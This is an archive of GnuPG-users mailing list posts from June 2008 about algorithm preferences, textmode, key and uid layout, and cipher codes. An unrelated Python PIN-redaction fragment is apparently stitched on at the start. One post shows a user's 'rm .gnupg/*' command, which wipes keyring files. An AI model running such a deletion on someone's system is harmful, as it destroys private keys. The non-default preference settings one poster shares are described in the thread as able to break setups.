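if __name__ == "__main__":
    clean, changed = sanitize(SAMPLE_LOG)
    print("\n".join(clean))
    print(f"{changed} line(s) redacted; "
          f"PIN still visible on lines: {pin_leaks(clean, '12345678')}")
```

Running `pin_leaks` with your own PIN over the file you are about to send is the final check; an empty list means the hex form of that PIN is not in it.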
From: wk at gnupg.org (Werner Koch)
Date: Mon, 23 Jun 2008 17:24:05 +0200
Subject: Session Key algorithm
In-Reply-To: <8919D897E400EC4A85E30E35FFBF702018A34C@pok1exch002.sfnt.local> (Yasuhiro Funaki's message of "Fri, 20 Jun 2008 19:15:14 +0800")
References: <8919D897E400EC4A85E30E35FFBF702018A34C@pok1exch002.sfnt.local>
Message-ID: <87od5s6up6.fsf@wheatstone.g10code.de>

On Fri, 20 Jun 2008 13:15, Yasuhiro.Funaki at safenet-inc.com said:

> I am wondering that which algorithm is used for the session key in GnuPG
> 1.4.8?

That is all described in RFC4880.

> I understand the session key is symmetric key and used for message
> encryption, my concern is the compatibility with PGP commercial.

Both are OpenPGP compliant.

> i.e PGP commercial use IDEA but GnuPG does not have it, then message can

No need for this because the preference system of OpenPGP handles the selection of the symmetric encryption algorithm.

Shalom-Salam,

   Werner

--
Die Gedanken sind frei. Auschnahme regelt ein Bundeschgesetz.

From Yasuhiro.Funaki at safenet-inc.com Mon Jun 23 01:57:32 2008
From: Yasuhiro.Funaki at safenet-inc.com (Funaki, Yasuhiro)
Date: Mon, 23 Jun 2008 07:57:32 +0800
Subject: Session Key algorithm
Message-ID: <8919D897E400EC4A85E30E35FFBF702018A350@pok1exch002.sfnt.local>

Dear Expert,

I am wondering that which algorithm is used for the session key in GnuPG 1.4.8? I understand the session key is symmetric key and used for message encryption, my concern is the compatibility with PGP commercial. i.e PGP commercial use IDEA but GnuPG does not have it, then message can not be decrypted with Gnupg??

Have a nice day.
Yasuhiro

From us3r07 at web.de Sat Jun 21 17:51:35 2008
From: us3r07 at web.de (us3r07 at web.de)
Date: Sat, 21 Jun 2008 17:51:35 +0200
Subject: GnuPG package without installer
Message-ID: <695021925@web.de>

Hello there,

it would be nice, if you could also provide an alternative GnuPG binary package for Windows without installer. I would suggest a simple zip file.

Thanks!

Regards,
Kevin

From rjh at sixdemonbag.org Mon Jun 23 13:44:50 2008
From: rjh at sixdemonbag.org (Robert J. Hansen)
Date: Mon, 23 Jun 2008 06:44:50 -0500
Subject: About my prefered settings...
In-Reply-To: <485C7636.3040809@gmail.com>
References: <485C7636.3040809@gmail.com>
Message-ID: <485F8CB2.3020300@sixdemonbag.org>

Faramir wrote:
> But now, I would like to know what cipher algorithms, hash function and
> compression I am using... and of course, I don't know how to know it. Is
> there a way to know, by looking at my public key (or sending some
> command to gpg), what is my preferred settings?

The best way is to take a look at a message you've already sent someone, but this time use the "-v" ("verbose") flag. Using it twice will give more detail. E.g.:

gpg --verbose --verbose my_encrypted_file.asc

It'll give you more data than you can shake a stick at.

From dshaw at jabberwocky.com Mon Jun 23 19:23:46 2008
From: dshaw at jabberwocky.com (David Shaw)
Date: Mon, 23 Jun 2008 13:23:46 -0400
Subject: About my prefered settings...
In-Reply-To: <485F7410.4040901@gmail.com>
References: <485C7636.3040809@gmail.com> <485F6343.20604@bellsouth.net> <485F7410.4040901@gmail.com>
Message-ID: <20080623172346.GA39571@jabberwocky.com>

On Mon, Jun 23, 2008 at 05:59:44AM -0400, Faramir wrote:

> Now the question is: how do I set a "default prefered ^thing to use^"
> without making unavailable the other algorithms? The idea is to use the
> custom setting only when the recipient can receive messages using these
> settings... I think I'd like to use AES256, SHA256, and ZIP, but only if
> that doesn't produce unusable messages...

Put this in your gpg.conf:

personal-cipher-preferences aes256
personal-digest-preferences sha256
personal-compress-preferences zip

GPG will then use those algorithms when possible, but will never use them if it would make the recipient unable to decrypt.

David

From dshaw at jabberwocky.com Mon Jun 23 20:37:21 2008
From: dshaw at jabberwocky.com (David Shaw) Date: Mon, 23 Jun 2008 14:37:21 -0400 Subject: TEXTMODE Option in Gpg4Win ? In-Reply-To: References: Message-ID: <20080623183721.GB39571@jabberwocky.com> On Wed, Jun 18, 2008 at 09:03:42AM -0700, Larry Seabrook wrote: > Hello, > > We are using the Gpg4Win product for encrypting files. > > The files we are encrypting and sending are text files with carriage-return and linefeed characters at the end of each line (record). > > The receiver of these files needs the CR and LF characters preserved by the encryption-decryption process. The files contain valid text data only. > > When the file is decrypted by the receiver using another PGP-compliant product, the CR and LF characters are lost. > > I BELIEVE we need to use the TEXTMODE=ON option when encrypting the file but the GUI for Gpg4Win does not reference this option, not can I find any reference to a Configuration File in the Gpg4Win GUI or documentation. > > QUESTION: How is TEXTMODE=ON or it's equivalent set when using Gpg4Win? "TEXTMODE=ON" is an old PGP 2.x command. It has nothing to do with GPG. Plus, it's actually the opposite of what you want. In OpenPGP, a text file is canonicalized into a standard format when encrypted, and re-canonicalized to the platform local format when decrypted. Both of these steps can change the CRLF line ending. If you want to guarantee that there are no changes at all, and the decrypted data is a byte for byte copy of the original, then turn off textmode. David From kzembowe at jhuccp.org Mon Jun 23 19:27:52 2008 
From: kzembowe at jhuccp.org (Zembower, Kevin)
Date: Mon, 23 Jun 2008 13:27:52 -0400
Subject: What regenerates files in ~/.gnupg?
Message-ID:

What's automatically regenerating the files in my ~/.gnupg/ directory, using the Ubuntu 8.04 system:

kevinz at kevinz-laptop:~$ date;rm .gnupg/*;sleep 10; ls -l .gnupg/*;date
Mon Jun 23 12:30:38 EDT 2008
-rw------- 1 kevinz kevinz 0 2008-06-23 12:30 .gnupg/pubring.gpg
-rw------- 1 kevinz kevinz 0 2008-06-23 12:30 .gnupg/secring.gpg
-rw------- 1 kevinz kevinz 40 2008-06-23 12:30 .gnupg/trustdb.gpg
Mon Jun 23 12:30:48 EDT 2008
kevinz at kevinz-laptop:~$

This really bit me recently, when, as a newbie to gpg, I copied my keys from another system to a USB memory stick, then copied them to the kevinz-laptop system to learn how to use encryption with Evolution, added a new key for private use, uploaded it to keyservers, then tried to move the files back to my USB stick. When I saw the files regenerated, I thought I had made a mistake with my 'mv' command, so without looking at the timestamps or sizes of the file, just repeated the 'mv' command, with the result of wiping out the new key I generated.

Thanks for your help understanding this issue.

-Kevin

From dshaw at jabberwocky.com Mon Jun 23 20:58:46 2008
From: dshaw at jabberwocky.com (David Shaw)
Date: Mon, 23 Jun 2008 14:58:46 -0400
Subject: What regenerates files in ~/.gnupg?
In-Reply-To:
References:
Message-ID: <20080623185845.GD39571@jabberwocky.com>

On Mon, Jun 23, 2008 at 01:27:52PM -0400, Zembower, Kevin wrote:
> What's automatically regenerating the files in my ~/.gnupg/ directory,
> using the Ubuntu 8.04 system:
> kevinz at kevinz-laptop:~$ date;rm .gnupg/*;sleep 10; ls -l .gnupg/*;date
> Mon Jun 23 12:30:38 EDT 2008
> -rw------- 1 kevinz kevinz 0 2008-06-23 12:30 .gnupg/pubring.gpg
> -rw------- 1 kevinz kevinz 0 2008-06-23 12:30 .gnupg/secring.gpg
> -rw------- 1 kevinz kevinz 40 2008-06-23 12:30 .gnupg/trustdb.gpg
> Mon Jun 23 12:30:48 EDT 2008
> kevinz at kevinz-laptop:~$
>
> This really bit me recently, when, as a newbie to gpg, I copied my keys
> from another system to a USB memory stick, then copied them to the
> kevinz-laptop system to learn how to use encryption with Evolution,
> added a new key for private use, uploaded it to keyservers, then tried
> to move the files back to my USB stick. When I saw the files
> regenerated, I thought I had made a mistake with my 'mv' command, so
> without looking at the timestamps or sizes of the file, just repeated
> the 'mv' command, with the result of wiping out the new key I generated.

If you run gpg, and those files don't exist, gpg will create them. I can't say what is running gpg so often on your system, but something is doing it - possibly evolution.

David

From david at coffeefish.org Mon Jun 23 21:28:44 2008
From: david at coffeefish.org (David Koppenhofer) Date: Mon, 23 Jun 2008 15:28:44 -0400 Subject: Multiple uid's vs. multiple primary keys & "master signing keys" Message-ID: Hi everyone, I'm a potential new gpg user, and have been struggling with a few questions about how uid's and keys should be configured. I've poured over the documentation, mailing list, and web pages, and now want to verify what I've come up with so far. I know there are probably no "right" answers, but I would like to know if there is some kind of general consensus about "best practice". At the least, maybe I can find out how people have things set up for real-world usage. 1) Multiple uid's (emails) per primary key versus multiple primary keys I have 3 email addresses I currently use: one personal, one for foss development, and one for work. I could create 3 uid's associated with the same primary key (option A), or 3 separate primary keys with 1 uid each (option B). Here are the trade-offs I've thought of - are they right? Anything else I should consider? * Option A would require 1 passphrase, where B would require 3 passphrases. * Assuming someone wants to certify all 3 uid's: - Option A would require 1 fingerprint to be verified, B would require 3 fingerprints to be verified. - In both cases, 3 signatures would have to be made by the signer, one for each uid. Option A would be more "streamlined" since gnupg prompts the signer whether or not to sign each uid of a key (right?). Option B would require the other party to do "--sign-key" three times. * Option A has 1 encryption key, B has 3. In the 3-key scenario, if I'm forced to reveal encrypted messages to one of the addresses, the others are not automatically compromised. * As far as the web of trust goes: in both options, other people can trust the authenticity of each uid differently. I guess the difference is when I certify others' keys. 
With option A, I only certify keys with one key, whereas option B would give me a choice of 3 keys to certify with. I suppose that I would have 3 webs of trust in that case. If I include someone in all three webs, then their key will be signed by my name 3 times, albeit with 3 separate key id's. Would that be "weird"? I suppose this is where a "master signing key" comes in... 2) "Master signing key" In the above option B, I could create a fourth (sign-only) key with which I cross-sign my 3 "uid keys" to unify the webs of trust. * Would I certify other people's keys ONLY with this fourth key, and not the other 3? * Wouldn't other people have to then certify at least 2 of my keys: the "master" and as many "uid keys" as they want to? Or would my cross-signing the "master" and the other person's trust in the "master" key cause the "uid keys" to be trusted? * Do people have problems signing a "master signing key" that may not have an email address associated with it? I'm leaning towards Option A (1 primary with 3 uid's), just because it seems simpler. Option B (3 primary, 1 uid each) is still appealing because each uid gets its own encryption key. Is that the only trade-off between those two options? Wow, sorry for the very long-winded message. Thanks in advance for any feedback. Best regards, David From larry_seabrook at yamaha-motor.com Mon Jun 23 21:45:39 2008 From: larry_seabrook at yamaha-motor.com (Larry Seabrook) Date: Mon, 23 Jun 2008 12:45:39 -0700 Subject: TEXTMODE Option in Gpg4Win ? In-Reply-To: <20080623183721.GB39571@jabberwocky.com> Message-ID: David, Do you recommend having a "gpg.conf" file containing "TEXTMODE=OFF" or just omitting that file altogether? Thanks, Larry -----Original Message----- 
From: gnupg-users-bounces+larry_seabrook=yamaha-motor.com at gnupg.org [mailto:gnupg-users-bounces+larry_seabrook=yamaha-motor.com at gnupg.org] On Behalf Of David Shaw
Sent: June 23, 2008 11:37 AM
To: gnupg-users at gnupg.org
Subject: Re: TEXTMODE Option in Gpg4Win ?

On Wed, Jun 18, 2008 at 09:03:42AM -0700, Larry Seabrook wrote:
> Hello,
>
> We are using the Gpg4Win product for encrypting files.
>
> The files we are encrypting and sending are text files with carriage-return and linefeed characters at the end of each line (record).
>
> The receiver of these files needs the CR and LF characters preserved by the encryption-decryption process. The files contain valid text data only.
>
> When the file is decrypted by the receiver using another PGP-compliant product, the CR and LF characters are lost.
>
> I BELIEVE we need to use the TEXTMODE=ON option when encrypting the file but the GUI for Gpg4Win does not reference this option, not can I find any reference to a Configuration File in the Gpg4Win GUI or documentation.
>
> QUESTION: How is TEXTMODE=ON or it's equivalent set when using Gpg4Win?

"TEXTMODE=ON" is an old PGP 2.x command. It has nothing to do with GPG. Plus, it's actually the opposite of what you want. In OpenPGP, a text file is canonicalized into a standard format when encrypted, and re-canonicalized to the platform local format when decrypted. Both of these steps can change the CRLF line ending.

If you want to guarantee that there are no changes at all, and the decrypted data is a byte for byte copy of the original, then turn off textmode.

David

From dshaw at jabberwocky.com Mon Jun 23 21:53:44 2008
From: dshaw at jabberwocky.com (David Shaw) Date: Mon, 23 Jun 2008 15:53:44 -0400 Subject: TEXTMODE Option in Gpg4Win ? In-Reply-To: References: <20080623183721.GB39571@jabberwocky.com> Message-ID: <20080623195344.GE39571@jabberwocky.com> > On Wed, Jun 18, 2008 at 09:03:42AM -0700, Larry Seabrook wrote: > > Hello, > > > > We are using the Gpg4Win product for encrypting files. > > > > The files we are encrypting and sending are text files with carriage-return and linefeed characters at the end of each line (record). > > > > The receiver of these files needs the CR and LF characters preserved by the encryption-decryption process. The files contain valid text data only. > > > > When the file is decrypted by the receiver using another PGP-compliant product, the CR and LF characters are lost. > > > > I BELIEVE we need to use the TEXTMODE=ON option when encrypting the file but the GUI for Gpg4Win does not reference this option, not can I find any reference to a Configuration File in the Gpg4Win GUI or documentation. > > > > QUESTION: How is TEXTMODE=ON or it's equivalent set when using Gpg4Win? > > "TEXTMODE=ON" is an old PGP 2.x command. It has nothing to do with GPG. Plus, it's actually the opposite of what you want. In OpenPGP, a text file is canonicalized into a standard format when encrypted, and re-canonicalized to the platform local format when decrypted. > Both of these steps can change the CRLF line ending. > > If you want to guarantee that there are no changes at all, and the decrypted data is a byte for byte copy of the original, then turn off textmode. On Mon, Jun 23, 2008 at 12:45:39PM -0700, Larry Seabrook wrote: > David, > > Do you recommend having a "gpg.conf" file containing "TEXTMODE=OFF" or just omitting that file altogether? > > Thanks, > > Larry Please do not top-post. As I said, TEXTMODE=whatever is not a GPG command. It has no functionality in GPG whatsoever. GPG defaults to textmode being disabled. 
If you are not turning it on, GPG doesn't turn it on for you. David From dshaw at jabberwocky.com Mon Jun 23 22:23:53 2008 
From: dshaw at jabberwocky.com (David Shaw)
Date: Mon, 23 Jun 2008 16:23:53 -0400
Subject: Multiple uid's vs. multiple primary keys & "master signing keys"
In-Reply-To:
References:
Message-ID: <20080623202353.GF39571@jabberwocky.com>

On Mon, Jun 23, 2008 at 03:28:44PM -0400, David Koppenhofer wrote:
> Hi everyone,
>
> I'm a potential new gpg user, and have been struggling with a few
> questions about how uid's and keys should be configured. I've poured
> over the documentation, mailing list, and web pages, and now want to
> verify what I've come up with so far. I know there are probably no
> "right" answers, but I would like to know if there is some kind of
> general consensus about "best practice". At the least, maybe I can
> find out how people have things set up for real-world usage.
>
> 1) Multiple uid's (emails) per primary key versus multiple primary keys
> I have 3 email addresses I currently use: one personal, one for foss
> development, and one for work. I could create 3 uid's associated with
> the same primary key (option A), or 3 separate primary keys with 1 uid
> each (option B).
>
> Here are the trade-offs I've thought of - are they right? Anything
> else I should consider?
> * Option A would require 1 passphrase, where B would require 3 passphrases.

Not necessarily. You are free to use 1 passphrase for all 3 keys if you like.

> * Assuming someone wants to certify all 3 uid's:
> - Option A would require 1 fingerprint to be verified, B would
> require 3 fingerprints to be verified.

Yes.

> - In both cases, 3 signatures would have to be made by the signer,
> one for each uid.
> Option A would be more "streamlined" since gnupg prompts the signer
> whether or not to sign each uid of a key (right?). Option B would
> require the other party to do "--sign-key" three times.

Yes.

> * Option A has 1 encryption key, B has 3. In the 3-key scenario, if
> I'm forced to reveal encrypted messages to one of the addresses, the
> others are not automatically compromised.

Yes.

> * As far as the web of trust goes: in both options, other people can
> trust the authenticity of each uid differently.

Yes.

> I guess the difference is when I certify others' keys. With option A,
> I only certify keys with one key, whereas option B would give me a
> choice of 3 keys to certify with. I suppose that I would have 3 webs
> of trust in that case. If I include someone in all three webs, then
> their key will be signed by my name 3 times, albeit with 3 separate
> key id's. Would that be "weird"? I suppose this is where a "master
> signing key" comes in...

Not weird. Some people do it that way. Some people find it annoying. It's really a matter of taste.

> 2) "Master signing key"
> In the above option B, I could create a fourth (sign-only) key with
> which I cross-sign my 3 "uid keys" to unify the webs of trust.
>
> * Would I certify other people's keys ONLY with this fourth key, and
> not the other 3?

Yes.

> * Wouldn't other people have to then certify at least 2 of my keys:
> the "master" and as many "uid keys" as they want to? Or would my
> cross-signing the "master" and the other person's trust in the
> "master" key cause the "uid keys" to be trusted?

The latter. They would just sign your master key, and you'd sign your own "uid key" with your master.

> * Do people have problems signing a "master signing key" that may not
> have an email address associated with it?

Many do. I personally do have a problem with it, as it makes it very difficult to validate the key unless you know the person personally.

> I'm leaning towards Option A (1 primary with 3 uid's), just because it
> seems simpler. Option B (3 primary, 1 uid each) is still appealing
> because each uid gets its own encryption key. Is that the only
> trade-off between those two options?

It's handy to make a distinction between your work and personal life, and for many or even most people, their personal "identity" is a lot longer lived than their work "identity".
People keep the same personal address for years, but don't as often keep the same job (and thus job address) for that long.

Personally, I do this with two keys. One personal, and one work. I don't really get the work one signed, as people who want to reach me generally do so in my personal context (I do FOSS work, but I do it under my personal address as I've found that many people just send mail to personal addresses even if there is a special address for FOSS stuff).

David

From jmoore3rd at bellsouth.net Tue Jun 24 01:25:52 2008
From: jmoore3rd at bellsouth.net (John W. Moore III)
Date: Mon, 23 Jun 2008 19:25:52 -0400
Subject: About my prefered settings...
In-Reply-To: <485F7410.4040901@gmail.com>
References: <485C7636.3040809@gmail.com> <485F6343.20604@bellsouth.net> <485F7410.4040901@gmail.com>
Message-ID: <48603100.7050508@bellsouth.net>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Faramir wrote:

> Cifrado: AES256, AES192, AES, CAST5, 3DES (cipher)
> Resumen: SHA1, SHA256, RIPEMD160 (hashing)
> Compresión: ZLIB, BZIP2, ZIP, Sin comprimir [no compression] (compression)
> Características: MDC, Sevidor de claves no-modificar (settings, maybe?)
>
> Well, it seems I have not messed the config (yet)...
>
> Now the question is: how do I set a "default prefered ^thing to use^"
> without making unavailable the other algorithms? The idea is to use the
> custom setting only when the recipient can receive messages using these
> settings... I think I'd like to use AES256, SHA256, and ZIP, but only if
> that doesn't produce unusable messages...

OK, I'm Back and find from parsing My Inbox that I have been "quoted" and 'covered' by others. Sorry I wasn't here all day feeling insecure enough to 'speak' for Myself.

Robert J. Hansen & David Shaw have both 'answered' Your Question succinctly; but I personally feel they have missed the essence of Your Question based solely upon Your 'Previous' Post regarding how to see what GPG is "doing."

Remember how I told You how to 'showpref'? Well, now You can tell gpg.exe what You'd prefer to be broadcast on Your Public Key by changing 'showpref' to 'setpref' and then using a string like this:

setpref S9 S2 S13 S10 S4 S12 S8 S11 S7 S3 S1 H10 H9 H8 H11 H6 H3 H2 Z3 Z2 Z1

Then You'll need to provide Your passphrase and follow the prompts. It should be noted that You will need to then Upload Your Key 'again' to the Keyservers so they will reflect Your changes.
You will also need to then require /every/ correspondent to 'refresh' Your Key so the Key they have for You on their Keyring reflects Your 'New' Preferences. Bear in mind also, folks using Ubuntu may not have Z3 available [BZIP2] but that isn't relevant because this is a "Preference" and their installation will compare it with the native ability to Encrypt to what You "prefer" so if it isn't possible it will default to the next 'preference.'

If You wish to 'force' something specific then You enter this line in gpg.conf:

digest-algo SHA256 [or whatever]

*ALWAYS* Keep In Mind that anytime You _force_ an algorithm, hash or compression You are making the Recipient dependent upon Your choices. If their installation cannot 'handle' it then they will Holler.

setpref will broadcast to the Recipient's Keyring what You desire but if You wish to _demand_ Your installation to use Your Preferences then You will need to add the following lines to Your gpg.conf:

personal-cipher-preferences S9 S2 S13 S10 S4 S12 S8 S11 S7 S3 S1
personal-digest-preferences H10 H9 H8 H11 H6 H3 H2
personal-compress-preferences Z3 Z2 Z1

Now, PAY ATTENTION: These are the lines from MY gpg.conf and unless You have built Your version of GnuPG to Support TIGER192 [H6] or Camellia [S10, S11, S12] then those designations will _break_ You being able to use Your installation.

There are Members of this List who understand I 'break rules' and some call Me an 'I-D-I-O-T', I prefer the term /Bleeding Edge/ but this in NO way makes Me correct. DO NOT think Me anything other than a 'breadbox' builder rather than an 'Off The Shelf' Amateur. Robert, John Clizbe, Werner, David & Marcus are very correct, accurate and honest when they strongly suggest that the Defaults be honored/accepted.

JOHN ;)
Timestamp: Monday 23 Jun 2008, 19:25 --400 (Eastern Daylight Time)
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.5.0-svn4754: (MingW32)
Comment: Public Key at: http://tinyurl.com/8cpho
Comment: Gossamer Spider Web of Trust: https://www.gswot.org
Comment: Homepage: http://tinyurl.com/yzhbhx
-----END PGP SIGNATURE-----

From rjh at sixdemonbag.org Tue Jun 24 03:43:38 2008
From: rjh at sixdemonbag.org (Robert J. Hansen)
Date: Mon, 23 Jun 2008 20:43:38 -0500
Subject: About my prefered settings...
In-Reply-To: <48603100.7050508@bellsouth.net>
References: <485C7636.3040809@gmail.com> <485F6343.20604@bellsouth.net> <485F7410.4040901@gmail.com> <48603100.7050508@bellsouth.net>
Message-ID: <4860514A.7060903@sixdemonbag.org>

> There are Members of this List who understand I 'break rules' and some
> call Me an I-D-I-O-T', I prefer the term /Bleeding Edge/ but this in NO
> way makes Me correct.

I'd characterize it this way, actually:

The source is free. You're free to do with it as you like, and most people here will steadfastly defend your right to do these sorts of things so long as you uphold the license agreement for GnuPG.

That said, please, please, please, don't send exotic traffic to people who aren't expecting it. It annoys them, it increases their frustration with the entire system, and the more frustrated people get the less likely they are to use GnuPG.

And finally, if it breaks you get to keep both pieces. :)

From faramir.cl at gmail.com Tue Jun 24 05:30:28 2008
From: faramir.cl at gmail.com (Faramir)
Date: Mon, 23 Jun 2008 23:30:28 -0400
Subject: Multiple uid's vs. multiple primary keys & "master signing keys"
In-Reply-To:
References:
Message-ID: <48606A54.1020104@gmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

David Koppenhofer wrote:
....
> 1) Multiple uid's (emails) per primary key versus multiple primary keys
> I have 3 email addresses I currently use: one personal, one for foss
> development, and one for work. I could create 3 uid's associated with
> the same primary key (option A), or 3 separate primary keys with 1 uid
> each (option B).

*I* would use option B, one key for each uid. The reason is because if somebody takes a look at a public key with several uid's, that somebody would know all these uid's are closely related, and also would know the email address for each uid.

I heard, a couple of weeks ago, about somebody who lost all her email accounts because her primary email address was hacked. The hacker knew the other email addresses, used the option "I forgot my password, send it to my secondary email", and all the other email accounts sent their passwords to the email that was compromised... allowing the hacker to take control of all these accounts, changing the security questions and secondary emails, so the true owner can't recover the accounts.

Since then, I'd like to keep my email accounts isolated from each other... I still have to figure out a way to set the secondary addresses to still be able to ask my password in case I forget it, but without risking all my accounts if somebody takes control over one of them.

But all this is just my opinion about the subject, your opinion doesn't need to be the same...

Best Regards
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
-----END PGP SIGNATURE-----

From faramir.cl at gmail.com Tue Jun 24 06:27:56 2008
From: faramir.cl at gmail.com (Faramir)
Date: Tue, 24 Jun 2008 00:27:56 -0400
Subject: About my prefered settings...
In-Reply-To: <20080623172346.GA39571@jabberwocky.com>
References: <485C7636.3040809@gmail.com> <485F6343.20604@bellsouth.net> <485F7410.4040901@gmail.com> <20080623172346.GA39571@jabberwocky.com>
Message-ID: <486077CC.6070004@gmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

David Shaw wrote:
...
> Put this in your gpg.conf:
>
> personal-cipher-preferences aes256
> personal-digest-preferences sha256
> personal-compress-preferences zip
>
> GPG will then use those algorithms when possible, but will never use
> them if it would make the recipient unable to decrypt.

John W. Moore III wrote:
...
> setpref will broadcast to the Recipient's Keyring what You desire but if
> You wish to _demand_ Your installation to use Your Preferences then You
> will need to add the following lines to Your gpg.conf:
>
> personal-cipher-preferences S9 S2 S13 S10 S4 S12 S8 S11 S7 S3 S1
> personal-digest-preferences H10 H9 H8 H11 H6 H3 H2
> personal-compress-preferences Z3 Z2 Z1
>
> Now, PAY ATTENTION: These are the lines from MY gpg.conf and unless You
> have built Your version of GnuPG to Support TIGER192 [H6] or Camellia
> [S10, S11, S12] then those designations will _break_ You being able to
> use Your installation.

Thanks for the answers. I am a bit confused about if I should use names like aes256 or codes like S9. Also, do I have to include all the cipher/digest/compress algorithms available to my installed gpg, or just one or two? The idea would be "if you can, use this one, if not, do as you wish/can"

Also, I couldn't locate the list of equivalences between names and codes, like AES256 - S9 in the gpg.man file... I found a list using google, but it is for an older version, which didn't include all the things available in version 1.4.9...
Best Regards

From rjh at sixdemonbag.org Tue Jun 24 07:20:18 2008
From: rjh at sixdemonbag.org (Robert J. Hansen)
Date: Tue, 24 Jun 2008 00:20:18 -0500
Subject: About my prefered settings...
In-Reply-To: <486077CC.6070004@gmail.com>
References: <485C7636.3040809@gmail.com> <485F6343.20604@bellsouth.net> <485F7410.4040901@gmail.com> <20080623172346.GA39571@jabberwocky.com> <486077CC.6070004@gmail.com>
Message-ID: <48608412.1050208@sixdemonbag.org>

Faramir wrote:
> Thanks for the answers. I am a bit confused about if I should use
> names like aes256 or codes like S9.

Six of one, half dozen of another. I think it's generally for the best if people use names, since they're easier to read and harder to screw up.

> Also, do I have to include all the cipher/digest/compress algorithms
> available to my installed gpg, or just one or two? The idea would be
> "if you can, use this one, if not, do as you wish/can"

This is not really possible with GnuPG. setpref is used to advertise _capabilities_ to people far more than it is to advertise preferences. It appears to me to be badly misnamed.

personal-thingy-preferences are the actual preference list, but is only applied to traffic you generate.

From kevhilton at gmail.com Tue Jun 24 13:39:04 2008
From: kevhilton at gmail.com (Kevin Hilton)
Date: Tue, 24 Jun 2008 06:39:04 -0500
Subject: About my prefered settings...
Message-ID: <96c450350806240439q3d5ffd8cta1b29e3e076fd5c5@mail.gmail.com>

Typing gpg -v --version will give you the capabilities along with the relative numbers for your compiled version of gpg

Example:

$ gpg -v --version
gpg (GnuPG) 1.4.10-svn4783
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Home: ~/.gnupg
Supported algorithms:
Pubkey: RSA, RSA-E, RSA-S, ELG-E, DSA
Cipher: IDEA (S1), 3DES (S2), CAST5 (S3), BLOWFISH (S4), AES (S7), AES192 (S8), AES256 (S9), TWOFISH (S10), CAMELLIA128 (S11), CAMELLIA192 (S12), CAMELLIA256 (S13)
Hash: MD5 (H1), SHA1 (H2), RIPEMD160 (H3), SHA256 (H8), SHA384 (H9), SHA512 (H10), SHA224 (H11)
Compression: Uncompressed (Z0), ZIP (Z1), ZLIB (Z2), BZIP2 (Z3)

--
Kevin Hilton

From dshaw at jabberwocky.com Tue Jun 24 14:56:53 2008
From: dshaw at jabberwocky.com (David Shaw)
Date: Tue, 24 Jun 2008 08:56:53 -0400
Subject: About my prefered settings...
In-Reply-To: <486077CC.6070004@gmail.com>
References: <485C7636.3040809@gmail.com> <485F6343.20604@bellsouth.net> <485F7410.4040901@gmail.com> <20080623172346.GA39571@jabberwocky.com> <486077CC.6070004@gmail.com>
Message-ID: <5CFD6CA0-FB6A-4387-9404-E8262D26EF07@jabberwocky.com>

On Jun 24, 2008, at 12:27 AM, Faramir wrote:

> Thanks for the answers. I am a bit confused about if I should use
> names like aes256 or codes like S9. Also, do I have to include all the
> cipher/digest/compress algorithms available to my installed gpg, or just
> one or two? The idea would be "if you can, use this one, if not, do as
> you wish/can"

S9 and AES256 are the same thing. Use whichever you like. I'd recommend using the full name - the S9 thing is really just backwards compatibility to an older version of GPG.

For personal-blahblah-preferences, list the ones you want to use when you make messages. If that list fails (because your recipients can't all handle them), you'll end up with 3DES.

Similarly, when setting preferences on your key, list the ones you want other people to use when they make messages for you. Again, if that list fails (because the other recipients of the message can't all handle them), you'll end up with 3DES.

> Also, I couldn't locate the list of equivalences between names and
> codes, like AES256 - S9 in the gpg.man file... I found a list using
> google, but it is for an older version, which didn't include all the
> things available in version 1.4.9...

gpg -v --version lists all the number codes, but again, use the names.

David

From faramir.cl at gmail.com Tue Jun 24 16:11:28 2008
From: faramir.cl at gmail.com (Faramir)
Date: Tue, 24 Jun 2008 10:11:28 -0400
Subject: About my prefered settings...
In-Reply-To: <5CFD6CA0-FB6A-4387-9404-E8262D26EF07@jabberwocky.com>
References: <485C7636.3040809@gmail.com> <485F6343.20604@bellsouth.net> <485F7410.4040901@gmail.com> <20080623172346.GA39571@jabberwocky.com> <486077CC.6070004@gmail.com> <5CFD6CA0-FB6A-4387-9404-E8262D26EF07@jabberwocky.com>
Message-ID: <48610090.4020708@gmail.com>

David Shaw wrote:
>> Also, I couldn't locate the list of equivalences between names and
>> codes, like AES256 - S9 in the gpg.man file... I found a list using
>> google, but it is for an older version, which didn't include all the
>> things available in version 1.4.9...
>
> gpg -v --version lists all the number codes, but again, use the names.

Thanks, David (and thanks to Kevin Hilton, he wrote about the same command, very useful), and of course, all the other people sharing their knowledge :)

And I was wrong when I said I had not yet messed the config file... I erased the utf-8 preference, and now, there are no more weird characters:

Home: C:/Archivos de programa/GNU/GnuPG
Algoritmos disponibles:
Clave pública: RSA, RSA-E, RSA-S, ELG-E, DSA
Cifrado: 3DES, CAST5, BLOWFISH, AES, AES192, AES256, TWOFISH
Resumen: MD5, SHA1, RIPEMD160, SHA256, SHA384, SHA512, SHA224
Compresión: Sin comprimir, ZIP, ZLIB, BZIP2

(last time, there were words like "Compresi??n:" and "Caracter??sticas:")

Well, I think I don't have more doubts about gpg settings... I will do a little "research" about strength of algorithms,(wikipedia, probably), and I won't mess with the character sets any more...

Now, the bad news... I will install gpg 2 in a virtual machine, and start trying to figure how do the new features work... so there will be a lot more questions... :P

Best Regards, and thanks for the help provided, it is really hard to find a list so active and helpful as this one (Enigmail list is great, too... maybe because a lot of people is in both lists)

From vedaal at hush.com Wed Jun 25 00:10:33 2008
From: vedaal at hush.com (vedaal at hush.com)
Date: Tue, 24 Jun 2008 18:10:33 -0400
Subject: cipher ID's
Message-ID: <20080624221035.DB80BD032F@mailserver10.hushmail.com>

just curious // ? O.T.

gnupg lists the following cipher ID's for symmetric algorithms:

Home: ~/.gnupg
Supported algorithms:
Pubkey: RSA, RSA-E, RSA-S, ELG-E, DSA
Cipher: IDEA (S1), 3DES (S2), CAST5 (S3), BLOWFISH (S4), AES (S7), AES192 (S8), AES256 (S9), TWOFISH (S10)

rfc-4880 section 9.2 lists (S5) and (S6) as "Reserved"
http://tools.ietf.org/html/rfc4880#section-9

reserved for what?
